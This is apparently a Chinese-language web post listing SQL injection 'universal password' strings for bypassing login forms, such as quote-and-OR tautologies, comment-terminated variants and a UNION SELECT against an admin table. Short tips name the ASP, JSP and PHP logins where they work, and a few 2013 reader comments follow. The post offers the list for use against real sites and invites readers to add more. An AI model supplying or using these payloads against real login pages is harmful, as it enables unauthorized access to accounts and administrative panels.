各种利用形式如下: 

'or'='or'
'or''='
'or ''='
" or "a"="a
"or "a"="a
"or 1=1--
"or 1=1%00
"or"="a'='a
"or=or"
') or ('a'='a
')or('a'='a
1 or '1'='1' or 1=1
1 or '1'='1'=1
1'or'1'='1
admin' or 'a'='a 密码随便
admin'or'1'='1'--
admin' or '1'='1'--
a'or' 1=1--
a 'or' 1=1--
or 1=1--
'or 1=1--
'or' '1'='1
or 1=1-- '
'OR 1=1%00
or 'a'='a
'or'='1'
'or''=''or''='
' or ''=''or''='
'or'1'='1
' or '1'='1
'or'a'='a
' or 'a'='a
'xor
用户名: ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)密码: 1

特殊说明:

1.admin ' or '  membership/login.asp(国外某程序)

2.admin 1'or'1'='1 用于jsp程序,如果管理员有admin这个用户,有一定成功率。

3.存在字符型注入的php网站是可以用万能密码' or 1=1/*的(某文章提到过)

欢迎各位补充以及提出意见

留言评论(旧系统):

佚名 @ 2013-07-15 14:33:52

我用万能密码没有成功过

本站回复:

人品问题……

哈哈 @ 2013-07-16 10:14:49

这么多要一个个试试?

本站回复:

有几种都是依靠一样的原理,只是语句变形了而已。